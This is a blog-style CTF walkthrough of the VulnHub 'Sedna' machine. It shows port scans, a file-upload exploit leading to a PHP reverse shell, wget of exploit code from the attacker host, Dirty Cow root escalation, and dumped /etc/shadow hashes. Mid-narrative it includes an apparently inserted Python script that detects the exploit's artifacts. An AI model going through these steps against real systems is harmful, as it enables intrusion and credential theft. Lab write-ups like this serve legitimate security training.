5 December 2022

Pentesting Fun Stuff

following the cyber security path…

hackfest2016: Sedna

Location

https://download.vulnhub.com/hackfest2016/Sedna.ova

Description

This is a vulnerable machine I created for the Hackfest 2016 CTF http://hackfest.ca/
Difficulty : Medium
According to the description there are multiple ways to root this box. This machine should be doable for someone who has some experience.
There are 4 flags on this machine 1 for a shell, 1 for root access and 2 for doing post exploitation on Sedna.

Getting started

Starting with nmap to see what ports are open and what services run behind them.

┌─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -sC -p- 192.168.171.5
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-17 20:18 CET
Nmap scan report for 192.168.171.5
Host is up (0.0096s latency).
Not shown: 65523 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
|   2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_  256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp    open  domain      ISC BIND 9.9.5-3-Ubuntu
| dns-nsid:
|_  bind.version: 9.9.5-3-Ubuntu
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3        Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE STLS TOP RESP-CODES SASL UIDL CAPA PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          47986/tcp  status
|_  100024  1          52537/udp  status
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd (Ubuntu)
|_imap-capabilities: LOGIN-REFERRALS IDLE more have ID post-login SASL-IR listed capabilities LOGINDISABLEDA0001 STARTTLS LITERAL+ IMAP4rev1 ENABLE OK Pre-login
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
445/tcp   open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    Dovecot imapd (Ubuntu)
|_imap-capabilities: LOGIN-REFERRALS IDLE more ID have SASL-IR post-login listed OK capabilities LITERAL+ IMAP4rev1 ENABLE AUTH=PLAINA0001 Pre-login
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3    Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
47986/tcp open  status      1 (RPC #100024)
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 59m56s, deviation: 0s, median: 59m56s
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   NetBIOS computer name: SEDNA\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-03-17T16:20:58-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.68 seconds

A lot of open ports and services running. I’ll start with port 80 and work my way through the list of open ports.

Webserver

First stop is the main page. Nothing much in the source code, so it’s time to start up dirsearch.

┌─[n13mant@planetmars]─[~]
└──╼ $python3 ./dirsearch/dirsearch.py -u 'http://192.168.171.5' -r -e php -w '/usr/share/wordlists/dirb/common.txt' -x 404,405
 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )
Extensions: php | Threads: 10 | Wordlist size: 4614
Error Log: /home/n13mant/dirsearch/logs/errors-17-03-21_12-56-27.log
Target: http://192.168.171.5
[12:56:27] Starting:
[12:56:27] 200 -  101B  - /
[12:56:27] 403 -  284B  - /.hta
[12:56:40] 301 -  314B  - /blocks  ->  http://192.168.171.5/blocks/
[12:56:56] 301 -  313B  - /files  ->  http://192.168.171.5/files/
[12:57:03] 200 -  101B  - /index.html
[12:57:13] 301 -  315B  - /modules  ->  http://192.168.171.5/modules/
[12:57:28] 200 -   36B  - /robots.txt
[12:57:31] 403 -  293B  - /server-status
[12:57:38] 301 -  314B  - /system  ->  http://192.168.171.5/system/
[12:57:39] 301 -  314B  - /themes  ->  http://192.168.171.5/themes/

Because there is a proxy server running I’ll do the dirsearch scan again, but this time via the proxy server.

┌─[n13mant@planetmars]─[~]
└──╼ $python3 ./dirsearch/dirsearch.py -u 'http://192.168.171.5:8080/' -r -e php -w '/usr/share/wordlists/dirb/common.txt' -x 404,405
 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )
Extensions: php | Threads: 10 | Wordlist size: 4614
Error Log: /home/n13mant/dirsearch/logs/errors-17-03-21_12-58-28.log
Target: http://192.168.171.5:8080/
[12:58:28] Starting:
[12:58:29] 200 -    2KB - /
[12:58:53] 302 -    0B  - /docs  ->  http://192.168.171.5:8080/docs/
[12:58:57] 302 -    0B  - /examples  ->  http://192.168.171.5:8080/examples/
[12:59:05] 302 -    0B  - /host-manager  ->  http://192.168.171.5:8080/host-manager/
[12:59:07] 200 -    2KB - /index.html
[12:59:13] 302 -    0B  - /manager  ->  http://192.168.171.5:8080/manager/
[12:59:14] 302 -    0B  - /META-INF  ->  http://192.168.171.5:8080/META-INF/

This time I get an HTTP basic authentication prompt. Before following this lead further, I run a nikto scan on port 80 first.

┌─[n13mant@planetmars]─[~]
└──╼ $nikto -h 'http://192.168.171.5/'
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.171.5
+ Target Hostname:    192.168.171.5
+ Target Port:        80
+ Start Time:         2017-03-21 18:52:15 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53fb059bb5bc8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7536 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2017-03-21 18:53:05 (GMT1) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

A license file with possible site software. Worth taking a look. First I run nikto again, but this time via the proxy server.

┌─[n13mant@planetmars]─[~]
└──╼ $nikto -h 'http://192.168.171.5/' --useproxy 'http://192.168.171.5:8080/'
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.171.5
+ Target Hostname:    192.168.171.5
+ Target Port:        80
+ Proxy:              192.168.171.5:8080
+ Start Time:         2017-03-21 13:16:53 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/1895 0x1475867860000
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS (May be proxy's methods, not server's)
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 7838 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-03-21 13:17:49 (GMT1) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Looking at all the information gathered, I decide to check out the license file first.

After a quick search on exploit-db it seems there is an exploit for this software that leads to an arbitrary file upload, placing the uploaded file in the /files/ folder.
The exploit includes a piece of HTML code that I can inject into the page; it creates a form to upload files.

For the upload I use the php reverse shell code from pentestmonkey. After I finished the upload I run the file and this way get a reverse shell.

┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $nc -lvnp 31337
Listening on [0.0.0.0] (family 0, port 31337)
Connection from 192.168.171.5 60358 received!
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
 15:17:37 up 37 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Now to look around the system.

www-data@Sedna:/home$ cat /etc/passwd
cat /etc/passwd
[.....SNIP....]
crackmeforpoints:x:1000:1000::/home/crackmeforpoints:
www-data@Sedna:/home$ cd /var/www
cd /var/www
www-data@Sedna:/var/www$ ls -lah
ls -lah
total 16K
drwxr-xr-x  3 root     root     4.0K Oct 22 13:33 .
drwxr-xr-x 13 root     root     4.0K Oct  7 15:17 ..
-rw-r--r--  1 www-data www-data   33 Oct 22 13:33 flag.txt
drwxr-xr-x  9 www-data www-data 4.0K Oct 25 09:27 html
www-data@Sedna:/var/www$ cat flag.txt
cat flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289

First flag.

www-data@Sedna:/$ uname -a
uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
www-data@Sedna:/$ cat /etc/*release
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

Ubuntu 14.04 and kernel 3.13.0. Maybe an overlayfs exploit will work to get root.
I download the code from exploit-db and paste it into a file on my local system. With SimpleHTTPServer I serve it and wget it onto the remote system. From there I compile it and run it.

www-data@Sedna:/tmp/n13mant$ wget http://192.168.171.3:8000/overlayfs.c
wget http://192.168.171.3:8000/overlayfs.c
--2017-03-24 00:34:09--  http://192.168.171.3:8000/overlayfs.c
Connecting to 192.168.171.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/plain]
Saving to: 'overlayfs.c'
100%[======================================>] 4,968       --.-K/s   in 0s
2017-03-24 00:34:09 (583 MB/s) - 'overlayfs.c' saved [4968/4968]
www-data@Sedna:/tmp/n13mant$ chmod 777 overlayfs.c
chmod 777 overlayfs.c
www-data@Sedna:/tmp/n13mant$ gcc overlayfs.c -o overlayfs
gcc overlayfs.c -o overlayfs
www-data@Sedna:/tmp/n13mant$ chmod 777 overlayfc
chmod 777 overlayfc
chmod: cannot access 'overlayfc': No such file or directory
www-data@Sedna:/tmp/n13mant$ chmod 777 overlayfs
chmod 777 overlayfs
www-data@Sedna:/tmp/n13mant$ ./overlayfs
./overlayfs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
www-data@Sedna:/tmp/n13mant$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The start looked promising… but unfortunately no root. With the kernel version number in hand I tried several exploits. After a while I tried the ‘Dirty Cow’ exploit. It’s a race condition that was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. In other words, an unprivileged local user could get write access to a read-only memory mapping and raise their privileges. There is a very good explanation about ‘Dirty Cow’, which you can find here. Also, to be fair, I must warn you that if you try different ‘Dirty Cow’ exploits it’s wise to make a snapshot of your Sedna box, because the exploit can crash the box and you need a fresh one to try again. In real life this would mean the admins will probably notice something is wrong with their server when it crashes, which normally isn’t a good thing, LoL.
After a few tries I found out the ‘Dirty Cow’ exploit from Firefart did the trick. After downloading the source code to the remote machine, I compiled and ran it. Unfortunately with this exploit I need to act fast: after running it, the box freezes up after a short while and I need to reboot it.

www-data@Sedna:/tmp$ mkdir n13mant
mkdir n13mant
www-data@Sedna:/tmp$ cd n13mant
www-data@Sedna:/tmp/n13mant$ wget http://192.168.171.3:8000/40839.c
wget http://192.168.171.3:8000/40839.c
--2017-03-25 11:25:25--  http://192.168.171.3:8000/40839.c
Connecting to 192.168.171.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5124 (5.0K) [text/plain]
Saving to: '40839.c'
100%[======================================>] 5,124       --.-K/s   in 0s
2017-03-25 11:25:25 (743 MB/s) - '40839.c' saved [5124/5124]
www-data@Sedna:/tmp/n13mant$ gcc -pthread 40839.c -o dcow -lcrypt
gcc -pthread 40839.c -o dcow -lcrypt
www-data@Sedna:/tmp/n13mant$ ./dcow thisismypassword
./dcow thisismypassword
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: thisismypassword
Complete line:
firefart:fiYb0/QFCUAsk:0:0:pwned:/root:/bin/bash
mmap: b7752000
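Both escalation attempts above leave artifacts a defender can look for: the overlayfs run reports "/etc/ld.so.preload created", and the Firefart Dirty Cow build backs /etc/passwd up to /tmp/passwd.bak and writes a UID-0 "firefart" line into it. The following host-side check is an added example, not code from the original post or from either exploit; the sample /etc/passwd content is constructed from the lines shown in this write-up.

```python
"""Host-side check for artifacts of the two privilege-escalation attempts
described above (added example, not part of the original post).

overlayfs exploit: creates /etc/ld.so.preload.
Firefart Dirty Cow: backs up /etc/passwd to /tmp/passwd.bak and writes a
UID-0 "firefart" entry with an inline password hash into /etc/passwd."""
import os
from typing import List, Tuple

# Constructed sample /etc/passwd: a normal root line plus the line the
# exploit printed ("Complete line: firefart:...:0:0:pwned:/root:/bin/bash").
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
firefart:fiYb0/QFCUAsk:0:0:pwned:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
crackmeforpoints:x:1000:1000::/home/crackmeforpoints:
"""


def suspicious_passwd_entries(passwd_text: str) -> List[Tuple[str, str]]:
    """Return (name, reason) pairs for lines that indicate tampering: any
    UID-0 account other than root, a hash stored inline instead of the
    shadow marker 'x', a malformed record, or a missing root entry."""
    findings: List[Tuple[str, str]] = []
    names = set()
    for raw in passwd_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        names.add(name)
        if uid == "0" and name != "root":
            findings.append((name, "UID 0 account that is not root"))
        if pw not in ("x", "*", "!", "!!", ""):
            findings.append((name, "password hash stored in /etc/passwd"))
    if "root" not in names:
        findings.append(("root", "root entry missing"))
    return findings


def exploit_artifacts(paths=("/etc/ld.so.preload", "/tmp/passwd.bak")) -> List[str]:
    """Return which of the known leftover files exist on this host."""
    return [p for p in paths if os.path.exists(p)]


if __name__ == "__main__":
    with open("/etc/passwd") as fh:
        for who, why in suspicious_passwd_entries(fh.read()):
            print(f"[!] {who}: {why}")
    for path in exploit_artifacts():
        print(f"[!] exploit artifact present: {path}")
```

Run as root on the host being audited; on a clean Ubuntu 14.04 box neither function should report anything.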

Now to move fast.

┌─[n13mant@planetmars]─[~]
└──╼ $ssh -l firefart 192.168.171.5
firefart@192.168.171.5's password:
Added user firefart.
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)
 * Documentation:  https://help.ubuntu.com/
  System information as of Sat Mar 25 11:49:03 EDT 2017
  System load: 0.41              Memory usage: 4%   Processes:       51
  Usage of /:  29.7% of 7.26GB   Swap usage:   0%   Users logged in: 0
  => There is 1 zombie process.
  Graph this data and manage this system at:
    https://landscape.canonical.com/
Last login: Sun Mar 12 00:41:47 2017 from 192.168.0.126
firefart@Sedna:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@Sedna:~# cat /etc/shadow
root:$6$sZyJlUny$OcHP9bd8dO9rAKAlryxUjnUbH0dxgZc2uCePZMUUKSeIdALUulXLQ1iDjoEQpvZI.HTHOHUkCR.m39Xrt3mm91:17097:0:99999:7:::
[.....SNIP.....]
crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7:::
statd:*:17110:0:99999:7:::
firefart@Sedna:~# ls -lah
total 65M
drwx------  5 firefart root 4.0K Mar 12 00:54 .
drwxr-xr-x 21 firefart root 4.0K Oct  7 15:17 ..
-rw-r--r--  1 firefart root  65M Oct 24 07:04 8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip
-rw-------  1 firefart root  212 Mar 12 00:54 .bash_history
-rw-r--r--  1 firefart root 3.1K Feb 19  2014 .bashrc
drwx------  2 firefart root 4.0K Oct 22 22:14 .cache
drwxr-xr-x  2 firefart root 4.0K Oct  7 20:04 chkrootkit
----------  1 firefart root   33 Oct 22 13:07 flag.txt
-rw-r--r--  1 firefart root  140 Feb 19  2014 .profile
-rw-r--r--  1 firefart root   66 Oct  8 03:34 .selected_editor
drwx------  2 firefart root 4.0K Oct 22 22:14 .ssh
firefart@Sedna:~# cat flag.txt
a10828bee17db751de4b936614558305

I got root… I got the flag… game over.
There are some more flags to gain, for example by cracking the hashes of ‘crackmeforpoints’ or ‘root’ with hashcat or John the Ripper, but for time reasons I’ll let someone else do that.

Conclusion

The challenge was a bit frustrating. Not many hints or leads to get further and when you finally get a working exploit, the system gets unstable and you need to hurry to get the job done. Too slow and you need to reboot and try again. I think the challenge would be a bit more fun if the system would be a bit more stable after the exploit. If someone else has a better solution, please do tell.